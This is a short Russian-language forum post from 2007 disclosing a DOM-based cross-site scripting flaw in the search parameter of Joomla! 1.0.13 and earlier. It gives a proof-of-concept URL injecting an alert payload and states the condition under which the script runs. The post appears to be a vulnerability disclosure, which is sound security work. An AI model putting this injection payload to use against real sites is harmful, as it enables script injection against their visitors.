09.11.2007, 23:22
|
|
Новичок
Регистрация: 26.04.2007
Сообщений: 13
Провел на форуме:
133453
Репутация:
17
|
|
Уязвимость в поиске по сайту в параметре searchword. Дыра является DOM based XSS.
http://site/index.
php?option=com_search&searchword=';alert('XSS')//
Для исполнения кода, пользователь должен сменить количество результатов поиска на одну страницу.
уязвимы версии Joomla! <= 1.0.13
|
|
|